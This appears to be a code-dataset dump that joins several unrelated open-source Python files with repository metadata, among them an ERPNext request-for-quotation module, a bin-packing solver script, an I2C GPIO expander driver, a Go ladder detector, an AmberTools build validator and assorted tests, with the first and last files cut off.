(if the line was never set, the info for the last set line
is returned)
:param line_nr: the line to retrieve the information for.
:return: the information for the given line.
"""
i = bisect.bisect_right(self.line_list, line_nr)
info_line = self.line_list[i-1]
return self.line_dict[info_line]
def get_line_info(self, line_nr):
return set(self.get_line_info_raw(line_nr))
def add_line(self, line_nr, info):
"""
Add the given information to the current dictionary.
        Note: while filling the dictionary, the line_nr argument has to
        be increasing (this is only to make sure the caller
        gets the intended behavior)!
:param line_nr: the line number of the information
:param info: the information for the current line
"""
if line_nr < self.lastItem:
raise ValueError("can only incrementally add items")
self.line_list.append(line_nr)
# to ensure reliability for the 'bisect_right' call in the function
# 'get_line_info_raw', make sure the lines in the line_list are sorted
self.line_list.sort()
self.line_dict[line_nr] = info
def values(self):
return self.line_dict.values()
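# Illustrative FileDict usage (not part of the original source): info is
# stored only on lines where it changes, and lookups bisect to the closest
# entry at or before the queried line.
#
#   fd = FileDict()
#   fd.add_line(1, ['feature_a'])                 # lines 1..9 -> feature_a
#   fd.add_line(10, ['feature_a', 'feature_b'])   # lines 10+  -> both
#   fd.get_line_info(5)     # set(['feature_a'])
#   fd.get_line_info(42)    # set(['feature_a', 'feature_b'])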
class FileCommit:
def __init__(self):
#filename under investigation
self.filename = None
#dictionary of dictionaries key is commit, value is a
#dictionary with keys=lineNumbers value=commitHash, stores
#the line number and corresponding commit hash for every
#line of the file,
self.fileSnapShots = {}
#stores the commit hash of all contributions to the file for a
#particular revision
self.revCmts = []
# dictionary with key = line number, value = function name
file_level = -1
self.functionIds = {file_level:'File_Level'}
# list of function line numbers in sorted order, this is for
# optimizing the process of finding a function Id given a line number
self.functionLineNums = [file_level]
# Function Implementation
self.functionImpl = {}
# True if start/end boundaries of artefacts are available (otherwise,
        # only the start of an artefact is known)
self.artefact_line_range = False
# source code element list
# stores all source code elements of interest and
# meta data
        # NOTE: This never seems to be used. Discuss with
# Mitchell what this was all about
self._src_elem_list = []
# dictionaries with key = line number, value = feature list|feature expression
self.feature_info = FileDict()
self.feature_expression_info = FileDict()
#Getter/Setters
def getFileSnapShots(self):
return self.fileSnapShots
def getFileSnapShot(self):
return self.fileSnapShots.values()[0]
def getFilename(self):
return self.filename
def setCommitList(self, cmtList):
self.revCmts = cmtList
def getrevCmts(self):
return self.revCmts
def getFuncImpl(self,id):
if id in self.functionImpl:
return self.functionImpl[id]
else:
return []
def setFunctionLines(self, functionIds):
self.functionIds.update(functionIds)
for id in self.functionIds.values():
self.functionImpl.update({id:[]})
self.functionLineNums.extend(sorted(self.functionIds.iterkeys()))
def setSrcElems(self, src_elem_list):
self._src_elem_list.extend(src_elem_list)
def set_feature_infos(self, feature_line_infos):
self.feature_info = feature_line_infos[0]
self.feature_expression_info = feature_line_infos[1]
#Methods
def addFileSnapShot(self, key, dict):
self.fileSnapShots[key] = dict
def findFuncId(self, line_num):
        # returns the identifier of a function given a line number
func_id = 'File_Level'
line_num = int(line_num)
if self.artefact_line_range == True:
if line_num in self.functionIds:
func_id = self.functionIds[line_num]
else:
i = bisect.bisect_right(self.functionLineNums, line_num)
func_line = self.functionLineNums[i-1]
func_id = self.functionIds[func_line]
return func_id
def getLineCmtId(self, line_num):
        ## Retrieve the first file snapshot
line_num = str(line_num)
file_snapshot = self.getFileSnapShot()
return file_snapshot[line_num]
def getLength(self):
return len(self.getFileSnapShot())
def getIndx(self):
return self.getFileSnapShot().keys()
def addFuncImplLine(self, lineNum, srcLine):
id = self.findFuncId(lineNum)
self.functionImpl[id].append(srcLine)
def findFeatureList(self, line_index):
return self.feature_info.get_line_info(int(line_index) + 1)
def findFeatureExpression(self, line_index):
return self.feature_expression_info.get_line_info(int(line_index) + 1)
|
kressi/erpnext
|
erpnext/buying/doctype/request_for_quotation/request_for_quotation.py
|
Python
|
gpl-3.0
| 10,014 | 0.027062 |
# -*- coding: utf-8 -*-
# Copyright (c) 2015, Frappe Technologies Pvt. Ltd. and contributors
# For license information, please see license.txt
from __future__ import unicode_literals
import frappe, json
from frappe import _
from frappe.model.mapper import get_mapped_doc
from frappe.utils import get_url, cint
from frappe.utils.user import get_user_fullname
from frappe.utils.print_format import download_pdf
from frappe.desk.form.load import get_attachments
from frappe.core.doctype.communication.email import make
from erpnext.accounts.party import get_party_account_currency, get_party_details
from erpnext.stock.doctype.material_request.material_request import set_missing_values
from erpnext.controllers.buying_controller import BuyingController
STANDARD_USERS = ("Guest", "Administrator")
class RequestforQuotation(BuyingController):
def validate(self):
self.validate_duplicate_supplier()
self.validate_common()
self.update_email_id()
def validate_duplicate_supplier(self):
supplier_list = [d.supplier for d in self.suppliers]
if len(supplier_list) != len(set(supplier_list)):
frappe.throw(_("Same supplier has been entered multiple times"))
def validate_common(self):
pc = frappe.get_doc('Purchase Common')
pc.validate_for_items(self)
def update_email_id(self):
for rfq_supplier in self.suppliers:
if not rfq_supplier.email_id:
rfq_supplier.email_id = frappe.db.get_value("Contact", rfq_supplier.contact, "email_id")
def validate_email_id(self, args):
if not args.email_id:
frappe.throw(_("Row {0}: For supplier {0} Email Address is required to send email").format(args.idx, args.supplier))
def on_submit(self):
frappe.db.set(self, 'status', 'Submitted')
def on_cancel(self):
frappe.db.set(self, 'status', 'Cancelled')
def send_to_supplier(self):
for rfq_supplier in self.suppliers:
if rfq_supplier.send_email:
self.validate_email_id(rfq_supplier)
# make new user if required
update_password_link = self.update_supplier_contact(rfq_supplier, self.get_link())
self.update_supplier_part_no(rfq_supplier)
self.supplier_rfq_mail(rfq_supplier, update_password_link, self.get_link())
def get_link(self):
# RFQ link for supplier portal
return get_url("/rfq/" + self.name)
def update_supplier_part_no(self, args):
self.vendor = args.supplier
        for item in self.items:
item.supplier_part_no = frappe.db.get_value('Item Supplier',
{'parent': item.item_code, 'supplier': args.supplier}, 'supplier_part_no')
def update_supplier_contact(self, rfq_supplier, link):
'''Create a new user for the supplier if not set in contact'''
update_password_link = ''
if frappe.db.exists("User", rfq_supplier.email_id):
user = frappe.get_doc("User", rfq_supplier.email_id)
else:
            user, update_password_link = self.create_user(rfq_supplier, link)
self.update_contact_of_supplier(rfq_supplier, user)
return update_password_link
def update_contact_of_supplier(self, rfq_supplier, user):
if rfq_supplier.contact:
contact = frappe.get_doc("Contact", rfq_supplier.contact)
else:
contact = frappe.new_doc("Contact")
contact.first_name = rfq_supplier.supplier_name or rfq_supplier.supplier
contact.supplier = rfq_supplier.supplier
if not contact.email_id and not contact.user:
contact.email_id = user.name
contact.user = user.name
contact.save(ignore_permissions=True)
def create_user(self, rfq_supplier, link):
user = frappe.get_doc({
'doctype': 'User',
'send_welcome_email': 0,
'email': rfq_supplier.email_id,
'first_name': rfq_supplier.supplier_name or rfq_supplier.supplier,
'user_type': 'Website User',
'redirect_url': link
})
user.save(ignore_permissions=True)
update_password_link = user.reset_password()
return user, update_password_link
def supplier_rfq_mail(self, data, update_password_link, rfq_link):
full_name = get_user_fullname(frappe.session['user'])
if full_name == "Guest":
full_name = "Administrator"
args = {
'update_password_link': update_password_link,
'message': frappe.render_template(self.message_for_supplier, data.as_dict()),
'rfq_link': rfq_link,
'user_fullname': full_name
}
subject = _("Request for Quotation")
template = "templates/emails/request_for_quotation.html"
sender = frappe.session.user not in STANDARD_USERS and frappe.session.user or None
message = frappe.get_template(template).render(args)
attachments = self.get_attachments()
self.send_email(data, sender, subject, message, attachments)
def send_email(self, data, sender, subject, message, attachments):
make(subject = subject, content=message,recipients=data.email_id,
sender=sender,attachments = attachments, send_email=True,
doctype=self.doctype, name=self.name)["name"]
frappe.msgprint(_("Email sent to supplier {0}").format(data.supplier))
def get_attachments(self):
attachments = [d.name for d in get_attachments(self.doctype, self.name)]
attachments.append(frappe.attach_print(self.doctype, self.name, doc=self))
return attachments
@frappe.whitelist()
def send_supplier_emails(rfq_name):
check_portal_enabled('Request for Quotation')
rfq = frappe.get_doc("Request for Quotation", rfq_name)
if rfq.docstatus==1:
rfq.send_to_supplier()
def check_portal_enabled(reference_doctype):
if not frappe.db.get_value('Portal Menu Item',
{'reference_doctype': reference_doctype}, 'enabled'):
frappe.throw(_("Request for Quotation is disabled to access from portal, for more check portal settings."))
def get_list_context(context=None):
from erpnext.controllers.website_list_for_contact import get_list_context
list_context = get_list_context(context)
list_context["show_sidebar"] = True
return list_context
# This method is used to make supplier quotation from material request form.
@frappe.whitelist()
def make_supplier_quotation(source_name, for_supplier, target_doc=None):
def postprocess(source, target_doc):
target_doc.supplier = for_supplier
args = get_party_details(for_supplier, party_type="Supplier", ignore_permissions=True)
target_doc.currency = args.currency or get_party_account_currency('Supplier', for_supplier, source.company)
target_doc.buying_price_list = args.buying_price_list or frappe.db.get_value('Buying Settings', None, 'buying_price_list')
set_missing_values(source, target_doc)
doclist = get_mapped_doc("Request for Quotation", source_name, {
"Request for Quotation": {
"doctype": "Supplier Quotation",
"validation": {
"docstatus": ["=", 1]
}
},
"Request for Quotation Item": {
"doctype": "Supplier Quotation Item",
"field_map": {
"name": "request_for_quotation_item",
"parent": "request_for_quotation"
},
}
}, target_doc, postprocess)
return doclist
# This method is used to make supplier quotation from supplier's portal.
@frappe.whitelist()
def create_supplier_quotation(doc):
if isinstance(doc, basestring):
doc = json.loads(doc)
try:
sq_doc = frappe.get_doc({
"doctype": "Supplier Quotation",
"supplier": doc.get('supplier'),
"terms": doc.get("terms"),
"company": doc.get("company"),
"currency": doc.get('currency') or get_party_account_currency('Supplier', doc.get('supplier'), doc.get('company')),
"buying_price_list": doc.get('buying_price_list') or frappe.db.get_value('Buying Settings', None, 'buying_price_list')
})
add_items(sq_doc, doc.get('supplier'), doc.get('items'))
sq_doc.flags.ignore_permissions = True
sq_doc.run_method("set_missing_values")
sq_doc.save()
frappe.msgprint(_("Supplier Quotation {0} created").format(sq_doc.name))
return sq_doc.name
except Exception:
return None
def add_items(sq_doc, supplier, items):
for data in items:
if data.get("qty") > 0:
if isinstance(data, dict):
data = frappe._dict(data)
create_rfq_items(sq_doc, supplier, data)
def create_rfq_items(sq_doc, supplier, data):
sq_doc.append('items', {
"item_code": data.item_code,
"item_name": data.item_name,
"description": data.description,
"qty": data.qty,
"rate": data.rate,
"supplier_part_no": frappe.db.get_value("Item Supplier", {'parent': data.item_code, 'supplier': supplier}, "supplier_part_no")
|
m1k3r/gvi-accounts
|
gvi/budgets/migrations/0004_remove_budgetelement_subcategory.py
|
Python
|
mit
| 364 | 0 |
# -*- coding: utf-8 -*-
from __future__ import unicode_literals
from django.db import models, migrations
class Migration(migrations.Migration):
dependencies = [
('budgets', '0003_auto_20150717_0147'),
]
operations = [
migrations.RemoveField(
model_name='budgetelement',
name='subcategory',
),
]
|
mgabay/Variable-Size-Vector-Bin-Packing
|
scripts/vbp-optim.py
|
Python
|
gpl-3.0
| 4,279 | 0.00631 |
from vsvbp import container, solver
import argparse, sys, os, re
def parse(inputfile):
""" Parse a file using format from
Brandao et al. [Bin Packing and Related Problems: General Arc-flow Formulation with Graph Compression (2013)]
Format:
d (number of dimensions)
C_1 ... C_d capacities of the bins in each dimension
n number of different items
w^1_1 ... w^d_1 d_1 requirements of item 1 + {demand = number of such items}
...
        w^1_n ... w^d_n d_n
Return: a list of items and a typical bin
"""
inp = inputfile
#inp = open(filename, 'r')
dim = int(inp.readline())
#if dim > 50: return False, False
cap = map(int, inp.readline().split())
assert dim == len(cap)
nitems = int(inp.readline())
items = []
i = 0
for line in inp:
        req = map(int, line.split())
dem = req.pop()
assert len(req) == dim
items.extend([container.Item(req) for j in xrange(dem)])
i += 1
assert i == nitems
inp.close()
return items, container.Bin(cap)
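# Illustrative input in the format parse() expects (hypothetical instance,
# not from the benchmark set):
#
#   2          <- number of dimensions
#   10 7       <- bin capacities per dimension
#   2          <- number of different items
#   3 2 4      <- item requiring (3, 2), demand 4
#   5 1 2      <- item requiring (5, 1), demand 2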
def natural_sort(l):
convert = lambda text: int(text) if text.isdigit() else text.lower()
alphanum_key = lambda key: [ convert(c) for c in re.split('([0-9]+)', key) ]
    return sorted(l, key=alphanum_key)
def get_subdirectories(directory):
dirs = [os.path.join(directory,name) for name in os.listdir(directory)
if os.path.isdir(os.path.join(directory, name))]
return natural_sort(dirs)
def get_files(directory):
files = [os.path.join(directory,name) for name in os.listdir(directory)
if os.path.isfile(os.path.join(directory, name))]
files.sort()
return natural_sort(files)
def optim_dir(directory, level=0):
files = get_files(directory)
for f in files:
optimize(f, level)
def optim_rec(directory, level=0):
subdir = get_subdirectories(directory)
print " "*level+ "|"+"- "+directory.split('/').pop()
if not subdir:
return optim_dir(directory, level+1)
for d in subdir:
optim_rec(d, level+1)
def optimize(filename, level=0):
fl = open(filename)
items, tbin = parse(fl)
if not items:
fl.close()
return
opt = len(solver.optimize(items, tbin, optimize.dp, optimize.seed).bins)
template = "{0:50}{1:10}"
if level == 0:
st = filename.split('/').pop()
print template.format(st, str(opt))
else:
st = " "*level+"| "+filename.split('/').pop()
print template.format(st, str(opt))
fl.close()
sys.stdout.flush()
def run():
parser = argparse.ArgumentParser(description="Run VSVBP heuristics on given instances")
parser.add_argument('-f', type=argparse.FileType('r'),
help="The path to a file containing the bin packing problem to optimize")
parser.add_argument('-d', help="A directory containing (only) files modeling\
bin packing problems to optimize. Optimize all files in the directory.")
parser.add_argument('-r', action='store_true', help="Recursive. If a directory is provided,\
optimize all files in all final subdirectories.")
parser.add_argument('-u', action='store_true', help="If activated, use dot product heuristics")
parser.add_argument('-s', type=int, help="Set seed to specified value")
args = parser.parse_args()
if not (args.f or args.d):
parser.error('No action requested, add -f or -d')
if args.f and args.d:
parser.error('Too many actions requested, add only -f or -d')
if args.r and not args.d:
sys.stderr.write("Warning recursive argument was specified but")
sys.stderr.write(" no directory was provided. Argument ignored.\n")
if args.d and not os.path.isdir(args.d):
parser.error('Invalid directory')
optimize.dp = args.u
optimize.seed = args.s
if args.f:
items, tbin = parse(args.f)
opt = len(solver.optimize(items, tbin, args.u, args.s).bins)
template = "{0:50}{1:10}"
st = args.f.name.split('/').pop()
print template.format(st, str(opt))
elif not args.r:
optim_dir(args.d)
else:
optim_rec(args.d)
if __name__ == "__main__":
run()
|
myDevicesIoT/Cayenne-Agent
|
myDevices/devices/digital/pcf8574.py
|
Python
|
mit
| 2,274 | 0.006157 |
# Copyright 2012-2013 Eric Ptak - trouch.com
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
from myDevices.utils.types import toint
from myDevices.devices.i2c import I2C
from myDevices.devices.digital import GPIOPort
class PCF8574(I2C, GPIOPort):
FUNCTIONS = [GPIOPort.IN for i in range(8)]
def __init__(self, slave=0x20):
slave = toint(slave)
if slave in range(0x20, 0x28):
self.name = "PCF8574"
elif slave in range(0x38, 0x40):
self.name = "PCF8574A"
else:
raise ValueError("Bad slave address for PCF8574(A) : 0x%02X not in range [0x20..0x27, 0x38..0x3F]" % slave)
I2C.__init__(self, slave)
GPIOPort.__init__(self, 8)
self.portWrite(0xFF)
self.portRead()
def __str__(self):
return "%s(slave=0x%02X)" % (self.name, self.slave)
def __getFunction__(self, channel):
return self.FUNCTIONS[channel]
def __setFunction__(self, channel, value):
if not value in [self.IN, self.OUT]:
raise ValueError("Requested function not supported")
self.FUNCTIONS[channel] = value
def __digitalRead__(self, channel):
mask = 1 << channel
d = self.readByte()
return (d & mask) == mask
def __portRead__(self):
return self.readByte()
def __digitalWrite__(self, channel, value):
mask = 1 << channel
b = self.readByte()
if value:
b |= mask
else:
b &= ~mask
self.writeByte(b)
def __portWrite__(self, value):
self.writeByte(value)
class PCF8574A(PCF8574):
def __init__(self, slave=0x38):
PCF8574.__init__(self, slave)
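# Minimal usage sketch (hypothetical wiring; assumes the GPIOPort base class
# exposes public digitalRead/digitalWrite wrappers around the dunder methods
# above):
#   gpio = PCF8574()           # expander at the default 0x20 address
#   gpio.digitalWrite(3, 1)    # read-modify-write drives P3 high
#   state = gpio.digitalRead(3)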
|
lablup/sorna-repl
|
vendor/benchmark/minigo/oneoffs/ladder_detector.py
|
Python
|
lgpl-3.0
| 3,787 | 0.003169 |
# Copyright 2019 Google LLC
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""
Detect and count number of ladders in a directory of SGF files
Afterwards it may be useful to inspect the files or thumbnails
find . -iname '*.sgf' | xargs -P4 -I{} gogui-thumbnailer -size 256 {} {}.png
"""
import sys
sys.path.insert(0, '.')
import os
from collections import Counter, defaultdict
from absl import app
from tqdm import tqdm
from sgfmill import sgf, sgf_moves
import oneoff_utils
ADJACENT_FOR_LADDER = 10
def subtract(a, b):
return (b[0] - a[0], b[1] - a[1])
def manhattanDistance(a, b):
d = subtract(a, b)
    return abs(d[0]) + abs(d[1])
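# e.g. manhattanDistance((3, 3), (5, 4)) == 3, i.e. |5-3| + |4-3| (illustrative)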
def isLadderIsh(game_path):
with open(game_path) as sgf_file:
game_data = sgf_file.read().encode('utf-8')
g = sgf.Sgf_game.from_bytes(game_data)
_, moves = sgf_moves.get_setup_and_moves(g)
mostAdjacent = 0
mostStart = 0
# colorStart, moveStart
cS, mS = -1, (-2, -2)
adjacent = 0
# colorLast, moveLast
cL, mL = cS, mS
for i, (c, m) in enumerate(moves, 1):
if m is None:
continue
newColor = c != cL
dS = subtract(mS, m)
dL = manhattanDistance(mL, m)
diagonalDistance = abs(abs(dS[0]) - abs(dS[1]))
isLadder = ((c == cS and diagonalDistance <= 1 and dL == 2) or
(c != cS and diagonalDistance <= 2 and dL == 1))
if newColor and isLadder:
adjacent += 1
if adjacent > mostAdjacent:
mostAdjacent = adjacent
mostStart = i - adjacent
else:
cS = c
mS = m
adjacent = 0
cL, mL = c, m
if mostAdjacent >= ADJACENT_FOR_LADDER:
return (mostAdjacent, mostStart)
return None
def main(unused_argv):
assert len(unused_argv) == 2, unused_argv
sgf_dir = unused_argv[1]
sgf_dir += '/' * (sgf_dir[-1] != '/')
sgf_files = oneoff_utils.find_and_filter_sgf_files(sgf_dir)
per_folder = defaultdict(lambda: [0,0])
lengths = Counter()
ladders = []
for name in tqdm(sorted(sgf_files)):
folder = os.path.dirname(name[len(sgf_dir):])
per_folder[folder][0] += 1
ladderAt = isLadderIsh(name)
if ladderAt:
ladders.append((name, ladderAt))
lengths[ladderAt[0]] += 1
per_folder[folder][1] += 1
print("Ladderish({}): {}, {}".format(len(ladders), ladderAt, name))
from shutil import copyfile
replace = '/ladder/' + ('yes' if ladderAt else 'no') + '/'
copyfile(name, name.replace('/ladder/', replace))
print()
stars_per = max(max(lengths.values()) / 50, 1)
for length, c in sorted(lengths.items()):
print("{:2d} ({:<4d}): {}".format(length, c, "*" * int(c / stars_per)))
print()
if len(per_folder) > 1:
for folder, counts in sorted(per_folder.items()):
if not folder.endswith('/'): folder += "/"
print("{}/{} ({:.1f}%) {}".format(
counts[1], counts[0], 100 * counts[1] / counts[0], folder))
count = len(ladders)
print("{:3d}/{:<4d} ({:.1f}%) overall".format(
count, len(sgf_files), 100 * count / len(sgf_files)))
if __name__ == "__main__":
app.run(main)
|
Amber-MD/ambertools-conda-build
|
conda_tools/validate_ambertools_build.py
|
Python
|
mit
| 5,502 | 0.000545 |
import os
import sys
import subprocess
from contextlib import contextmanager
import argparse
import glob
ENV_ROOT = 'test_ambertools'
AMBER_VERSION = 'amber17'
def is_conda_package(package_dir):
basename = os.path.basename(package_dir)
return not (basename.startswith('osx') or basename.startswith('linux'))
def run_test(package_dir, amberhome, TEST_SCRIPT):
if is_conda_package(package_dir):
subprocess.check_call('bash {}'.format(TEST_SCRIPT), shell=True)
else:
subprocess.check_call(
"source {}/amber.sh && bash {}".format(amberhome, TEST_SCRIPT),
shell=True)
def install_ambertools(package_dir,
env_name,
tmp_dir='junk_folder',
pyver='2.7'):
if is_conda_package(package_dir):
# conda
subprocess.check_call(
'conda install {} -n {}'.format(package_dir, env_name), shell=True)
else:
amberhome = os.path.abspath(os.path.join(tmp_dir, AMBER_VERSION))
# non-conda
try:
os.mkdir(tmp_dir)
except OSError:
pass
os.chdir(tmp_dir)
if os.path.exists(AMBER_VERSION):
print("Existing {}. Skip untar".format(AMBER_VERSION))
else:
subprocess.check_call(['tar', '-xf', package_dir])
# os.environ['AMBERHOME'] = amberhome
# os.environ['PYTHONPATH'] = os.path.join(amberhome,
# 'lib/python{}/site-packages'.format(pyver))
# os.environ['PATH'] = os.path.join(amberhome, 'bin') + ':' + os.getenv("PATH")
def find_miniconda_root():
command = "conda info --base"
return subprocess.check_output(command, shell=True).decode().strip()
def create_env(env, python_version):
sys.stdout.write('creating {} env'.format(env))
cmlist = 'conda create -n {} python={} numpy nomkl --yes'.format(
env, python_version)
print(cmlist)
subprocess.check_call(cmlist.split())
@contextmanager
def run_env(env_name, python_version):
os.environ['PYTHONPATH'] = ''
ORIG_PATH = os.environ['PATH']
env_path = find_miniconda_root() + '/envs/' + env_name
env_bin_dir = env_path + '/bin/'
os.environ['CONDA_PREFIX'] = env_path
os.environ['PATH'] = env_bin_dir + ':' + ORIG_PATH
if not os.path.exists(find_miniconda_root() + '/envs/' + env_name):
create_env(env_name, python_version)
os.system('source activate {}'.format(env_name))
yield
os.system('conda env remove -n {} -y'.format(env_name))
os.environ['PATH'] = ORIG_PATH
def ensure_no_gfortran_local(amberhome):
errors = []
for fn in get_tested_files(amberhome):
cmd = ['otool', '-L', fn]
try:
output = subprocess.check_output(
cmd, stderr=subprocess.PIPE).decode()
except subprocess.CalledProcessError:
output = ''
if '/usr/local/gfortran' in output:
errors.append(fn)
return errors
def get_so_files(dest):
cmd = 'find {} -type f -name "*.so"'.format(dest)
print('cmd: {}'.format(cmd))
output = subprocess.check_output(cmd, shell=True)
output = output.decode()
files = [fn for fn in output.split('\n') if fn]
return files
def get_tested_files(dest):
so_files = get_so_files(dest)
# files_in_bin = [os.path.join(dest, 'bin', fn)
# for fn in ['cpptraj', 'sqm', 'mdgx']]
files_in_bin = glob.glob(os.path.join(dest, 'bin/*'))
return [
fn
for fn in so_files + files_in_bin + glob.glob(
os.path.join(dest, 'bin/to_be_dispatched/*')) + glob.glob(
os.path.join(dest, 'lib/*dylib'))
]
def main(args=None):
parser = argparse.ArgumentParser()
parser.add_argument("package_dir")
parser.add_argument("-py", dest='pyvers')
opt = parser.parse_args(args)
package_dir = opt.package_dir
tmp_dir = 'junk_folder' # only exists if non-conda package
conda_recipe = os.path.abspath(
os.path.join(os.path.dirname(__file__), '..', 'conda-ambertools-single-python'))
TEST_SCRIPT = '{}/run_test.sh'.format(conda_recipe)
print('conda_recipe', conda_recipe)
print('run_test', run_test)
pyvers = [
opt.pyvers,
] if opt.pyvers else ['2.7', '3.4', '3.5', '3.6', '3.7']
print('Python versions = {}'.format(pyvers))
print('conda package = {}'.format(is_conda_package(package_dir)))
errors = []
for py in pyvers:
env_name = ENV_ROOT + py
with run_env(env_name, py):
if is_conda_package(package_dir):
amberhome = find_miniconda_root() + '/envs/' + env_name
else:
# do not set CONDA_PREFIX to trigger
# unset PYTHONPATH in run_test.sh in this case.
os.environ['CONDA_PREFIX'] = ''
amberhome = os.path.join(
os.path.abspath(tmp_dir), AMBER_VERSION)
install_ambertools(package_dir, env_name, pyver=py)
if sys.platform.startswith('darwin'):
errors = ensure_no_gfortran_local(amberhome)
run_test(package_dir, amberhome, TEST_SCRIPT)
# check libgfortran
if errors:
print(
"ERROR: Files should not have /usr/local/gfortran in its content"
)
print(errors)
sys.exit(1)
else:
print("libgfortran fixed. Wonderful")
if __name__ == '__main__':
main()
|
dean0x7d/pybinding
|
docs/examples/lattice/checkerboard.py
|
Python
|
bsd-2-clause
| 801 | 0.003745 |
"""Two dimensional checkerboard lattice with real hoppings"""
import pybinding as pb
import matplotlib.pyplot as plt
from math import pi
pb.pltutils.use_style()
def checkerboard(d=0.2, delta=1.1, t=0.6):
    lat = pb.Lattice(a1=[d, 0], a2=[0, d])
lat.add_sublattices(
('A', [0, 0], -delta),
('B', [d/2, d/2], delta)
)
lat.add_hoppings(
([ 0, 0], 'A', 'B', t),
([ 0, -1], 'A', 'B', t),
([-1, 0], 'A', 'B', t),
([-1, -1], 'A', 'B', t)
)
return lat
lattice = checkerboard()
lattice.plot()
plt.show()
lattice.plot_brillouin_zone()
plt.show()
model = pb.Model(checkerboard(), pb.translational_symmetry())
solver = pb.solver.lapack(model)
bands = solver.calc_bands([0, 0], [0, 5*pi], [5*pi, 5*pi], [0, 0])
bands.plot()
plt.show()
|
mehtadev17/mapusaurus
|
mapusaurus/api/tests.py
|
Python
|
cc0-1.0
| 4,338 | 0.014292 |
import json
from django.core.urlresolvers import reverse
from django.http import HttpResponseNotFound
from django.test import TestCase
from mock import Mock
from utils import use_GET_in
from api.views import msas, tables
class ConversionTest(TestCase):
def test_use_GET_in(self):
fn, request = Mock(), Mock()
request.GET.lists.return_value = [('param1', [0]), ('param2', [-1])]
# Dictionaries become JSON
fn.return_value = {'a': 1, 'b': 2}
response = use_GET_in(fn, request)
self.assertEqual(json.loads(response.content), {'a': 1, 'b': 2})
self.assertEqual(fn.call_args[0][0], {'param1': [0], 'param2': [-1]})
# Everything else is unaltered
fn.return_value = HttpResponseNotFound('Oh noes')
response = use_GET_in(fn, request)
self.assertEqual(response.status_code, 404)
self.assertEqual(response.content, 'Oh noes')
class ViewsTests(TestCase):
fixtures = ['agency.json', 'fake_msa.json', 'api_tracts.json', 'test_counties.json', 'fake_respondents.json']
def test_api_all_user_errors(self):
resp = self.client.get(reverse('all'), {'neLat':'42.048794',
'neLon':'-87.430698',
'swLat':'',
'swLon':'-88.225583',
'year':'2013',
'action_taken':'1,2,3,4,5',
'lender':'736-4045996'})
self.assertEqual(resp.status_code, 404)
resp = self.client.get(reverse('all'), {'neLat':'42.048794',
'neLon':'-87.430698',
'swLat':'41.597775',
'swLon':'',
'year':'2013',
'action_taken':'1,2,3,4,5',
'lender':'736-4045996'})
self.assertEqual(resp.status_code, 404)
def test_api_msas_user_errors(self):
resp = self.client.get(reverse('msas'))
self.assertEqual(resp.status_code, 404)
resp = self.client.get(reverse('msas'), {'neLat':'42.048794',
'neLon':'-87.430698',
'swLat':'',
'swLon':'-88.225583',
'year':'2013',
'action_taken':'1,2,3,4,5',
'lender':'736-4045996'})
self.assertEqual(resp.status_code, 404)
resp = self.client.get(reverse('msas'), {'neLat':'42.048794',
'neLon':'-87.430698',
'swLat':'41.597775',
                                                 'swLon':'',
'year':'2013',
'action_taken':'1,2,3,4,5',
'lender':'736-4045996'})
self.assertEqual(resp.status_code, 404)
def test_api_msas_endpoint(self):
"""should return a list of MSA ids in view"""
coords = {'neLat': '36.551569', 'neLon':'-78.961487', 'swLat':'35.824494', 'swLon':'-81.828918'}
url = reverse(msas)
resp = self.client.get(url, coords)
result_list = json.loads(resp.content)
self.assertTrue(isinstance(result_list, list))
self.assertContains(resp, '49180')
def test_api_tables_endpoint(self):
"""should return table_data json for a lender/MSA pair"""
params = {'lender': '90000451965', 'metro': '49180'}
url = reverse(tables)
resp = self.client.get(url, params)
result_dict = json.loads(resp.content)
self.assertTrue(isinstance(result_dict, dict))
keys = ['counties', 'msa']
lender_keys = ['hma_pct', 'lma_pct', 'mma_pct', 'lma', 'mma', 'hma', 'lar_total', 'peer_hma_pct', 'peer_lma_pct', 'peer_mma_pct', 'peer_lma', 'peer_mma', 'peer_hma', 'peer_lar_total', 'odds_lma', 'odds_mma', 'odds_hma']
for key in keys:
self.assertTrue(key in result_dict.keys())
for key in lender_keys:
self.assertTrue(key in result_dict['msa'].keys())
self.assertTrue(len(result_dict['msa']) > 0)
|
NicovincX2/Python-3.5
|
Statistiques/Statistique descriptive/Mode (statistiques)/one_mode.py
|
Python
|
gpl-3.0
| 124 | 0.008065 |
# -*- coding: utf-8 -*-
import os
def onemode(values):
    return max(set(values), key=values.count)
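# Illustrative: onemode([1, 2, 2, 3]) returns 2, the most frequent value;
# max() scans the distinct values and keys each one by its count in the list.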
os.system("pause")
|
kiyo-masui/SDdata
|
sddata/tests/test_psrfits_to_sdfits.py
|
Python
|
gpl-2.0
| 9,556 | 0.009209 |
"""Unit tests for psrfits_to_sdfits.py."""
import unittest
import sys
import scipy as sp
import numpy.random as rand
import psrfits_to_sdfits as p2s
import kiyopy.custom_exceptions as ce
class TestFormatData(unittest.TestCase) :
def setUp(self) :
self.ntime = 5
self.npol = 4
self.nfreq = 10
self.good_data = sp.empty((self.ntime, self.npol, self.nfreq),
dtype=int)
self.good_data[:,:,:] = sp.reshape(sp.arange(self.ntime*self.nfreq),
(self.ntime, 1, self.nfreq))
self.good_data[:,0,:] += 100
self.good_data[:,1:,:] -= self.ntime*self.nfreq//2
self.raw_data = sp.empty((self.ntime, self.npol, self.nfreq),
dtype=sp.uint8)
self.raw_data[:,0,:] = self.good_data[:,0,:]
self.raw_data.dtype = sp.int8
self.raw_data[:,1:,:] = self.good_data[:,1:,:]
self.raw_data.dtype = sp.uint8
self.raw_data = self.raw_data.flatten()
def test_runs(self) :
p2s.format_data(self.raw_data, self.ntime, self.npol, self.nfreq)
def test_requires_uint(self) :
self.assertRaises(TypeError, p2s.format_data, self.good_data,
self.ntime, self.npol, self.nfreq)
def test_right_answer(self):
reformated = p2s.format_data(self.raw_data, self.ntime, self.npol,
self.nfreq)
